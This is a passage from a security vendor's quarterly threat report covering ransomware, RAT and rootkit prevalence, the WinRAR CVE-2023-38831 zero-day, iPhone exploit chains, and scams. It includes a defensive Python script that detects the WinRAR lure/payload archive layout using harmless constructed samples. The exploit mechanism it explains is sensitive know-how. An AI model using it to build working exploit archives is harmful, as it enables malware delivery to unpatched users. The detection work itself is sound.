  5547. <p>More information about this ransomware strain can be found in our <a href="https://decoded.avast.io/threatresearch/rhysida-ransomware-technical-analysis/" target="_blank" rel="noreferrer noopener">blog post</a>.&nbsp;</p>
  5548.  
  5549.  
  5550.  
5551. <p>As usual in every Threat Report, we bring an overview of the risk ratio in our userbase. The following picture shows the riskiest countries regarding ransomware.</p>
  5552.  
  5553.  
  5554. <div class="wp-block-image">
  5555. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-world-map-Q3-2023-1024x639.png" alt="" class="wp-image-7820" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-world-map-Q3-2023-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-world-map-Q3-2023-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-world-map-Q3-2023-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-world-map-Q3-2023-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-world-map-Q3-2023-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Ransomware risk ratio for Q3/2023</figcaption></figure></div>
  5556.  
  5557.  
  5558. <p>The list of countries most at risk of ransomware attacks:&nbsp;</p>
  5559.  
  5560.  
  5561.  
  5562. <ul>
  5563. <li>Mozambique (0.74%)&nbsp;</li>
  5564.  
  5565.  
  5566.  
  5567. <li>Angola (0.44%)&nbsp;</li>
  5568.  
  5569.  
  5570.  
  5571. <li>Ghana (0.35%)&nbsp;</li>
  5572.  
  5573.  
  5574.  
  5575. <li>Pakistan (0.20%)&nbsp;</li>
  5576. </ul>
  5577.  
  5578.  
  5579.  
  5580. <p>The most prevalent ransomware strains that we saw and protected against are listed below:&nbsp;</p>
  5581.  
  5582.  
  5583.  
  5584. <ul>
  5585. <li>WannaCry (19% of ransomware share)&nbsp;</li>
  5586.  
  5587.  
  5588.  
  5589. <li>STOP (15%)&nbsp;</li>
  5590.  
  5591.  
  5592.  
  5593. <li>Thanatos (3%)&nbsp;</li>
  5594.  
  5595.  
  5596.  
  5597. <li>TargetCompany (2%)&nbsp;</li>
  5598.  
  5599.  
  5600.  
  5601. <li>LockBit (2%)&nbsp;</li>
  5602.  
  5603.  
  5604.  
  5605. <li>Cryptonite (2%)&nbsp;</li>
  5606.  
  5607.  
  5608.  
  5609. <li>Enigma (1%)&nbsp;</li>
  5610. </ul>
  5611.  
  5612.  
  5613.  
  5614. <p>The total risk ratio amongst our user base remains approximately the same:</p>
  5615.  
  5616.  
  5617. <div class="wp-block-image">
  5618. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-Q3-2023-1024x404.png" alt="" class="wp-image-7821" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-Q3-2023-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-Q3-2023-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-Q3-2023-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-Q3-2023-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-Q3-2023-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Development of the ransomware threats in our user base</figcaption></figure></div>
  5619.  
  5620.  
  5621. <p class="has-text-align-right"><em>Ladislav Zezula, Malware Researcher</em><br><em>Jakub Křoustek, Malware Research Director</em></p>
  5622.  
  5623.  
  5624.  
  5625. <h3 class="wp-block-heading">Remote Access Trojans (RATs)</h3>
  5626.  
  5627.  
  5628.  
  5629. <p><em>A Remote Access Trojan (RAT) is a type of malicious software that allows unauthorized individuals to gain remote control over a victim&#8217;s computer or device. RATs are typically spread through social engineering techniques, such as phishing emails or infected file downloads. Once installed, RATs grant the attacker complete access to the victim&#8217;s device, enabling them to execute various malicious activities, such as spying, data theft, remote surveillance, and even taking control of the victim&#8217;s webcam and microphone.</em>&nbsp;</p>
  5630.  
  5631.  
  5632.  
  5633. <p>The growing trend of RATs observed in Q2/2023 continues in Q3/2023. Overall, we have seen a slight increase in the risk ratio. The substantial rise of Remcos we reported in Q1 and Q2/2023 seems to have slowed, with Remcos staying around the same numbers as in the previous quarter. However, we are observing a steady growth of the DBatLoader dropper which can deliver Remcos among other payloads.</p>
  5634.  
  5635.  
  5636. <div class="wp-block-image">
  5637. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/daily_hits_normalized_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-1024x404.png" alt="" class="wp-image-7822" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/daily_hits_normalized_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/daily_hits_normalized_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/daily_hits_normalized_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/daily_hits_normalized_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/daily_hits_normalized_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio in Avast’s user base regarding RATs in Q3/2023</em></figcaption></figure></div>
  5638.  
  5639.  
  5640. <p>The countries with the highest risk ratio regarding RATs are, as usual, Afghanistan, Iraq and Yemen, due to the worm-like behavior of HWorm, which seems to be widely spread in these countries. Additionally, we also see njRAT quite active in Iraq and Yemen. The countries with the largest increase in risk ratio are Portugal (148% increase), Poland (55%) and Slovakia (43%), caused by Remcos and, in the case of Slovakia, also Warzone. The biggest decrease in risk ratio was observed in Czechia (42% decrease), Belgium (34%) and Japan (33%). This is again likely tied to the activity (or, for the moment, the lack of it) of Remcos and Warzone in these countries.</p>
  5641.  
  5642.  
  5643. <div class="wp-block-image">
  5644. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/map_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-1024x639.png" alt="" class="wp-image-7823" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/map_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/map_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/map_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/map_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/map_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Map showing global risk ratio for RATs in Q3/2023</em></figcaption></figure></div>
  5645.  
  5646.  
  5647. <p>The largest increase in market share and number of protected users among the most prevalent RATs in Q3/2023 belongs to NanoCore; both numbers grew by nearly 100%. Greece, Turkey, and Hungary are the countries most at risk from this RAT, and we have also observed a substantial increase in Brazil, Mexico, and Spain.&nbsp;</p>
  5648.  
  5649.  
  5650.  
  5651. <p>XWorm saw an even bigger increase, gaining more than 400%. However, in absolute numbers, XWorm is not widespread enough to make the top 10 list.&nbsp;</p>
  5652.  
  5653.  
  5654.  
  5655. <p>Warzone and AsyncRat had the largest drops in risk ratio among the most prevalent RATs we see: Warzone went down by 27% and AsyncRat by 14% according to our data.&nbsp;</p>
  5656.  
  5657.  
  5658.  
  5659. <p>The most prevalent remote access trojan strains in our userbase are:&nbsp;</p>
  5660.  
  5661.  
  5662.  
  5663. <ul>
  5664. <li>HWorm&nbsp;</li>
  5665.  
  5666.  
  5667.  
  5668. <li>Remcos&nbsp;</li>
  5669.  
  5670.  
  5671.  
  5672. <li>njRAT&nbsp;</li>
  5673.  
  5674.  
  5675.  
  5676. <li>AsyncRat&nbsp;</li>
  5677.  
  5678.  
  5679.  
  5680. <li>Warzone&nbsp;</li>
  5681.  
  5682.  
  5683.  
  5684. <li>NanoCore&nbsp;</li>
  5685.  
  5686.  
  5687.  
  5688. <li>QuasarRAT&nbsp;</li>
  5689.  
  5690.  
  5691.  
  5692. <li>Gh0stCringe&nbsp;</li>
  5693.  
  5694.  
  5695.  
  5696. <li>DarkComet</li>
  5697.  
  5698.  
  5699.  
  5700. <li>Bifrost&nbsp;</li>
  5701. </ul>
  5702.  
  5703.  
  5704.  
  5705. <p>The <a href="https://www.uptycs.com/blog/remote-access-trojan-qwixx-telegram" target="_blank" rel="noreferrer noopener">Uptycs Threat Research</a> team discovered a new RAT named QwixxRAT, first noticed in early August. QwixxRAT has a fairly standard set of features, including keylogging, information theft (credit cards, browsing history and bookmarks, Steam-related data, etc.), spying (webcam, microphone), running commands on the infected system, and more. It uses Telegram as the C&amp;C channel.&nbsp;</p>
  5706.  
  5707.  
  5708.  
  5709. <p>ZenRAT is another RAT which appeared in Q3/2023, reported by <a href="https://www.proofpoint.com/us/blog/threat-insight/zenrat-malware-brings-more-chaos-calm" target="_blank" rel="noreferrer noopener">Proofpoint Emerging Threats</a>. This RAT was found bundled with the legitimate password manager Bitwarden, distributed from the website bitwariden[.]com. According to the research, ZenRAT is designed to be modular; however, Proofpoint observed only one module, which appears to gather system information.&nbsp;</p>
  5710.  
  5711.  
  5712.  
  5713. <p class="has-text-align-right"><em>Ondřej Mokoš, Malware Researcher</em></p>
  5714.  
  5715.  
  5716.  
  5717. <h3 class="wp-block-heading">Rootkits</h3>
  5718.  
  5719.  
  5720.  
  5721. <p><em>Rootkits are malicious software specifically designed to gain unauthorized access to a system and obtain high-level privileges. Rootkits can operate at the kernel layer of a system, which grants them deep access and control including the ability to modify critical kernel structures. This could enable other malware to manipulate system behavior and evade detection.</em>&nbsp;</p>
  5722.  
  5723.  
  5724.  
  5725. <p>Rootkit activity has been stable since the beginning of the year, although the long-term trend is still downward. The chart below shows the rootkit activity for the previous three quarters.</p>
  5726.  
  5727.  
  5728. <div class="wp-block-image">
  5729. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="890" height="351" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q321_malware_rootkit.png" alt="" class="wp-image-7824" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q321_malware_rootkit.png 890w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q321_malware_rootkit-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q321_malware_rootkit-768x303.png 768w" sizes="(max-width: 890px) 100vw, 890px" /><figcaption class="wp-element-caption"><em>Rootkit risk ratio in Q1/2023 – Q3/2023</em></figcaption></figure></div>
  5730.  
  5731.  
  5732. <p>When examining the risk ratio for individual countries, China maintains its leading position regarding the extent of rootkit activity. Although globally we are observing a decrease in activity, we have seen a notable increase in Ukraine (62%) and in the Russian Federation (62%), driven specifically by increased activity of the R77RK rootkit.</p>
  5733.  
  5734.  
  5735. <div class="wp-block-image">
  5736. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="890" height="555" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02-map_2023-Q2-Q3.gif" alt="" class="wp-image-7825"/><figcaption class="wp-element-caption"><em>Global risk ratio for rootkits in Q2 and Q3 2023</em></figcaption></figure></div>
  5737.  
  5738.  
  5739. <p>In September 2023, an updated version of R77Rootkit (1.5.0) was released, simplifying its deployment on victims’ machines. However, there was no increase in the activity of this rootkit despite the improvements. So, the R77RK is still the malware market leader with the same share (18%) as in the previous quarter.&nbsp;</p>
  5740.  
  5741.  
  5742.  
  5743. <p>Unidentified rootkit strains account for around 17% of the market share. These serve as kernel proxies for various activities requiring elevated system privileges, such as terminating processes, altering network communications, and registry operations, among others. Compared to the previous quarter, an interesting development is the increased use of VMProtect to obfuscate driver functionality.&nbsp;</p>
  5744.  
  5745.  
  5746.  
  5747. <p>The rootkit with the third-largest market share is Pucmeloun, whose primary functionality is the modification of network traffic to redirect users to different pages. It is a component of other adware that controls web requests at the kernel layer. The adware websites have primarily Chinese content.&nbsp;</p>
  5748.  
  5749.  
  5750.  
  5751. <p>The following is the comprehensive list of distinctly recognized Windows rootkit strains, along with their respective market shares:&nbsp;</p>
  5752.  
  5753.  
  5754.  
  5755. <ul>
  5756. <li>R77Rootkit (18%)&nbsp;</li>
  5757.  
  5758.  
  5759.  
  5760. <li>Pucmeloun (13%)&nbsp;</li>
  5761.  
  5762.  
  5763.  
  5764. <li>Alureon (7%)&nbsp;</li>
  5765.  
  5766.  
  5767.  
  5768. <li>Cerbu (6%)&nbsp;</li>
  5769.  
  5770.  
  5771.  
  5772. <li>Perkesh (6%)&nbsp;</li>
  5773. </ul>
  5774.  
  5775.  
  5776.  
  5777. <p>In terms of Linux kernel rootkits, inspired by Syslogk, threat actors continue hiding command-line backdoors (or bots, depending on how the attacker controls the infected computers) with kernel rootkits that execute them via magic packets (e.g. the <a href="https://www.virustotal.com/gui/file/d6e74832bbabca012bc0c3a8a5f1a87cb4b5d241e2a88b75cb01cb0e076b8c98" target="_blank" rel="noreferrer noopener">AntiUnhide</a> rootkit). We continue monitoring Linux kernel rootkits that reuse the code of open-source projects. For instance, <a href="https://www.virustotal.com/gui/file/391304d0ec9b5abd05001a2794d38ad8d1746bf51232fdaf150c67c6ce6957cc" target="_blank" rel="noreferrer noopener">Rocke</a> reuses the code of <a href="https://github.com/f0rb1dd3n/Reptile" target="_blank" rel="noreferrer noopener">Reptile</a> and hides a secret protected shell that can be spawned via magic packets.</p>
  5778.  
  5779.  
  5780.  
  5781. <p class="has-text-align-right"><em>Martin Chlumecký, Malware Researcher</em><br><em>David Álvarez, Malware Analyst</em></p>
  5782.  
  5783.  
  5784.  
  5785. <h3 class="wp-block-heading">Vulnerabilities and Exploits&nbsp;</h3>
  5786.  
  5787.  
  5788.  
  5789. <p><em>Exploits take advantage of flaws in legitimate software to perform actions that should not be allowed. They are typically categorized into remote code execution (RCE) exploits, which allow attackers to infect another machine, and local privilege escalation (LPE) exploits, which allow attackers to take more control of a partially infected machine.</em>&nbsp;</p>
  5790.  
  5791.  
  5792.  
  5793. <p>WinRAR is not a frequent target of exploits, aside from the occasional path traversal. Our attention was therefore immediately captivated when we first heard about <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831" target="_blank" rel="noreferrer noopener">CVE-2023-38831</a>, an easy-to-exploit WinRAR vulnerability which allows an attacker to craft a malicious archive so that it contains both a benign lure (e.g., an image file) and a malicious payload. When an unsuspecting victim opens such an archive in a vulnerable version of WinRAR and double-clicks the lure file, the malicious payload gets executed instead. This is because opening files from inside WinRAR is internally implemented by extracting the target files into a temporary folder and then calling ShellExecute on them. Unfortunately, due to buggy path normalization, it was possible to redirect the ShellExecute call to a different file than the one the user clicked on. For a more in-depth look at the exploit, we recommend reading <a href="https://blog.securelayer7.net/analysis-of-cve-2023-38831-zero-day-vulnerability-in-winrar/" target="_blank" rel="noreferrer noopener">this SecureLayer7 analysis</a>.&nbsp;</p>
  5794.  
  5795.  
  5796.  
  5797. <p>This vulnerability was exploited as a zero-day in financially motivated attacks since at least April 2023. The attacks took place on trading forums and consisted of attackers posting exploit archives promising details of novel trading strategies. However, instead of exciting new trading strategies, the archives were used to spread the DarkMe malware (or the Guloader -&gt; Remcos duo in some attacks). This campaign was initially discovered in July by the <a href="https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/" target="_blank" rel="noreferrer noopener">Group-IB Threat Intelligence unit</a>. After reporting the vulnerability to RARLAB, a patched version of WinRAR was released in August.&nbsp;&nbsp;</p>
  5798.  
  5799.  
  5800.  
  5801. <p>Since WinRAR must be updated manually by downloading and installing the patched version, we can expect there will continue to be many users with unpatched versions in the future. While the exploit does require a fair amount of user interaction (not every targeted user will open the archive in WinRAR and double click the lure file), it is quite easy to craft an exploit archive (there is even a public <a href="https://github.com/HDCE-inc/CVE-2023-38831" target="_blank" rel="noreferrer noopener">PoC builder</a> on GitHub), so it is likely that there will be threat actors experimenting with this vulnerability. And indeed, just recently <a href="https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/" target="_blank" rel="noreferrer noopener">Google TAG reported</a> on &#8220;multiple government-backed hacking groups” exploiting this vulnerability. Let us therefore use this opportunity to remind the reader not to delay <a href="https://www.rarlab.com/" target="_blank" rel="noreferrer noopener">applying the update</a>.</p>
  5802.  
  5803.  
  5804. <div class="wp-block-image">
  5805. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="767" height="255" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/q3_report_winrar.png" alt="" class="wp-image-7841" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/q3_report_winrar.png 767w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/q3_report_winrar-300x100.png 300w" sizes="(max-width: 767px) 100vw, 767px" /><figcaption class="wp-element-caption"><em>An exploit archive opened in a vulnerable version of WinRAR. Double-clicking the PDF file here would execute a malicious batch file located in the folder of the same name. Note that the PDF file does not have its usual icon. This is because there is an extra space appended to the end of the “.pdf” extension.</em></figcaption></figure></div>
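<p>A quick triage check for the archive layout described in the caption above, added here as an example; it is not code from the original report, from WinRAR or from any of the linked analyses. It parses the entry names of a ZIP archive and flags a file whose name ends in a space sitting next to a directory of exactly the same name that holds an executable whose name starts with the lure name. The ZIP container, the list of executable extensions and the constructed sample archives are assumptions of the example; the report only describes the lure/payload layout and the trailing space in the extension.</p>

```python
"""Triage ZIP archives for the CVE-2023-38831 lure/payload layout.

Pattern flagged:  "<lure>.pdf "  (trailing space)  next to a directory
named "<lure>.pdf " that contains "<lure>.pdf .cmd" or similar.
The container format and extension list are assumptions of this example.
"""
import io
import zipfile

# Extensions that ShellExecute would run as code (assumed list, not from the report).
EXECUTABLE_EXTS = (".cmd", ".bat", ".exe", ".com", ".vbs", ".js", ".ps1", ".scr", ".lnk")


def find_lure_payload_pairs(zip_bytes: bytes) -> list[tuple[str, str]]:
    """Return sorted (lure_path, payload_path) pairs matching the layout.

    Works at any directory depth: the lure file and the same-named directory
    only have to be siblings. Only entry names are inspected; nothing is
    extracted or executed.
    """
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        file_names = [i.filename for i in zf.infolist() if not i.is_dir()]

    # Map each directory path to the base names of the files directly inside it.
    children: dict[str, list[str]] = {}
    for name in file_names:
        parent, _, base = name.rpartition("/")
        if parent:
            children.setdefault(parent, []).append(base)

    hits = []
    for name in file_names:
        _, _, base = name.rpartition("/")
        if base == base.rstrip():
            continue  # no trailing whitespace in the name: not this pattern
        # A directory with exactly the lure's path (trailing space included)?
        for child in children.get(name, []):
            if child.startswith(base) and child.lower().endswith(EXECUTABLE_EXTS):
                hits.append((name, f"{name}/{child}"))
    return sorted(hits)


def build_constructed_sample() -> bytes:
    """Constructed archive mimicking the reported layout; contents are harmless."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("trading_strategy.pdf ", b"%PDF-1.4\n% decoy document\n")
        zf.writestr(
            "trading_strategy.pdf /trading_strategy.pdf .cmd",
            b"@echo off\r\necho constructed sample, does nothing\r\n",
        )
        zf.writestr("readme.txt", b"benign file with a normal name\n")
    return buf.getvalue()


def build_benign_sample() -> bytes:
    """Constructed archive with an ordinary file/directory pair (no trailing space)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4\n")
        zf.writestr("report/notes.txt", b"notes\n")
    return buf.getvalue()


if __name__ == "__main__":
    for label, data in (("constructed", build_constructed_sample()),
                        ("benign", build_benign_sample())):
        print(label, find_lure_payload_pairs(data))
```

<p>The check is deliberately narrow: a trailing space in an entry name is almost never legitimate, and requiring a same-named sibling directory with an executable inside keeps false positives low. It says nothing about whether the WinRAR build on a given host is patched; that is still decided by the version installed, which is why applying the vendor update matters more than any scanner.</p>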
  5806.  
  5807.  
  5808. <p>In other news, <a href="https://blog.google/threat-analysis-group/0-days-exploited-by-commercial-surveillance-vendor-in-egypt/" target="_blank" rel="noreferrer noopener">Google’s Threat Analysis Group</a> and <a href="https://citizenlab.ca/2023/09/predator-in-the-wires-ahmed-eltantawy-targeted-with-predator-spyware-after-announcing-presidential-ambitions/" target="_blank" rel="noreferrer noopener">Citizen Lab</a> discovered a new in-the-wild zero-day exploit chain for iPhones. This chain started with a WebKit RCE (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-41993" target="_blank" rel="noreferrer noopener">CVE-2023-41993</a>), which was combined with a signature bypass (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-41991" target="_blank" rel="noreferrer noopener">CVE-2023-41991</a>) and ultimately ended with a kernel LPE (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-41992" target="_blank" rel="noreferrer noopener">CVE-2023-41992</a>). Post-exploitation, the chain deployed the Predator implant, known to be developed by the commercial spyware vendor Intellexa. The attackers also used a parallel exploit chain for Android devices, but unfortunately the full details of this chain remain unknown at the time of writing.&nbsp;</p>
  5809.  
  5810.  
  5811.  
  5812. <p>As reported by Citizen Lab, one of the targets was former Egyptian MP Ahmed Eltantawy who announced his run for president in 2024. He was targeted through a man-in-the-middle (MitM) injection on plaintext HTTP, through a middlebox located at an ISP-level privileged network position. This essentially allowed the attackers to use a browser exploit with no user interaction required, similarly to how a watering hole or malvertising attack would work. While it is extremely hard to defend against such government-backed attackers, using a secure VPN should mitigate the risk of ISP-level MitM injection. However, note that just a single HTTP request outside the VPN tunnel is all the attackers would need to still be able to inject the exploit.&nbsp;</p>
  5813.  
  5814.  
  5815.  
  5816. <p>Finally, Q3/2023 also saw the discovery of BLASTPASS, an exploit chain that was actively used by the infamous NSO Group to compromise fully patched iPhones in a zero-click manner. BLASTPASS was <a href="https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/" target="_blank" rel="noreferrer noopener">discovered by the Citizen Lab</a>, who found it while helping check the device of a potential mercenary spyware victim. The initial memory corruption vulnerability appears to go by three different CVEs (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-41064" target="_blank" rel="noreferrer noopener">CVE-2023-41064</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-4863" target="_blank" rel="noreferrer noopener">CVE-2023-4863</a>, and <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-5129" target="_blank" rel="noreferrer noopener">CVE-2023-5129</a>), as there was <a href="https://x.com/wdormann/status/1704580087109066776" target="_blank" rel="noreferrer noopener">some</a> <a href="https://www.rezilion.com/blog/rezilion-researchers-uncover-new-details-on-severity-of-google-chrome-zero-day-vulnerability-cve-2023-4863/" target="_blank" rel="noreferrer noopener">confusion</a> at first about who should actually assign the CVE. Nevertheless, the vulnerable code is located in <a href="https://chromium.googlesource.com/webm/libwebp" target="_blank" rel="noreferrer noopener">libwebp</a>, Google&#8217;s library for encoding and decoding images in the WebP format. While this library is very widely used, it is not currently clear what conditions are needed for the vulnerability to be exploitable. There has been some <a href="https://blog.isosceles.com/the-webp-0day/" target="_blank" rel="noreferrer noopener">great research</a> into the root cause of the vulnerability and a <a href="https://github.com/mistymntncop/CVE-2023-4863" target="_blank" rel="noreferrer noopener">public PoC</a> to trigger a heap overflow. However, weaponizing this heap overflow seems like an extremely difficult feat, so at least for the moment, we do not have to fear this vulnerability being exploited in the wild by less sophisticated attackers.&nbsp;</p>
  5817.  
  5818.  
  5819.  
  5820. <p class="has-text-align-right"><em>Jan Vojtěšek, Malware Researcher</em></p>
  5821.  
  5822.  
  5823.  
  5824. <h2 class="wp-block-heading">Web Threats&nbsp;</h2>
  5825.  
  5826.  
  5827.  
  5828. <p>Users increasingly depend on the internet in their daily lives, exposing themselves to a growing array of potential risks, such as theft of their personal data or financial losses. The rise in activities such as variations of financial scams, dating scams, fake push notifications and phishing threats in general underscores this trend.&nbsp;</p>
  5829.  
  5830.  
  5831.  
  5832. <p>The third quarter of 2023 was a quarter of growth for web threats in general. Many types of threats started growing at the end of the holiday season, and this growth continued through the third quarter. There are some exceptions, however. Let us take a closer look at them.&nbsp;</p>
  5833.  
  5834.  
  5835.  
  5836. <h3 class="wp-block-heading">Scams&nbsp;&nbsp;</h3>
  5837.  
  5838.  
  5839.  
  5840. <p><em>A scam is a type of threat that aims to trick users into giving an attacker their personal information or money. We track diverse types of scams which are listed below.</em>&nbsp;</p>
  5841.  
  5842.  
  5843.  
  5844. <p>The significant increase in scam threats that we reported in Q2/2023 remained strong in the third quarter. As you can see in the following chart, we even saw a slight resumption of growth in mid-August.</p>
  5845.  
  5846.  
  5847. <div class="wp-block-image">
  5848. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01_Scams_daily_hiits-1024x404.png" alt="" class="wp-image-7866" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01_Scams_daily_hiits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01_Scams_daily_hiits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01_Scams_daily_hiits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01_Scams_daily_hiits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01_Scams_daily_hiits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Scam risk ratio over the last three quarters</em> </figcaption></figure></div>
  5849.  
  5850.  
  5851. <p>In line with the trends observed in Q2, malvertising continues to serve as a very strong tool for scammers, which they use to spread various categories of scams, including the popular dating scams and financial scams, for example. These threats have maintained their strong position, but this is not the case for technical support scams. However, we are seeing fake reports of viruses being found used to push sales of dubious products. Additionally, extortion email scams and phishing threats have both seen an uptick in popularity.</p>
  5852.  
  5853.  
  5854. <div class="wp-block-image">
  5855. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02_Scams_heatmap-1024x639.png" alt="" class="wp-image-7867" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02_Scams_heatmap-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02_Scams_heatmap-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02_Scams_heatmap-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02_Scams_heatmap-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02_Scams_heatmap-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio for scam in Q3/2023</figcaption></figure></div>
  5856.  
  5857.  
  5858. <p>The countries most at risk of scam attacks were Serbia, Kosovo, Montenegro, Albania, and Croatia.&nbsp;</p>
  5859.  
  5860.  
  5861.  
  5862. <p>Countries where the risk ratio increased include, for example, Japan (+19%), Greece (+17%), the United States (+14%), Austria (+13%), and Germany (+12%).&nbsp;</p>
  5863.  
  5864.  
  5865.  
  5866. <h3 class="wp-block-heading">Malvertising&nbsp;</h3>
  5867.  
  5868.  
  5869.  
  5870. <p>Malvertising is a malicious online advertising technique that involves the distribution of malware through online ads or, in some cases, in conjunction with browser push notifications. Cybercriminals use these seemingly legitimate ads to deliver malware to unsuspecting users&#8217; devices when they click on or interact with the compromised advertisements.&nbsp;</p>
  5871.  
  5872.  
  5873.  
  5874. <p>Cybercriminals are smart enough to make their malvertising pop-ups look genuine. Frequently, these fraudulent pop-ups exploit a recognizable antivirus company’s logo. The goal is to convince users they are encountering a legitimate notification from an antivirus provider. These alerts typically claim that a virus has been found on the computer and that the subscription plan has expired.&nbsp;</p>
  5875.  
  5876.  
  5877.  
  5878. <p>Upon clicking these deceptive pop-ups, unsuspecting users may find themselves redirected to a fake website. These fraudulent sites often take the form of straightforward phishing pages, where users are asked to enter personal credit card information under the guise of providing antivirus services. The scam can take many forms.</p>
  5879.  
  5880.  
  5881. <div class="wp-block-image">
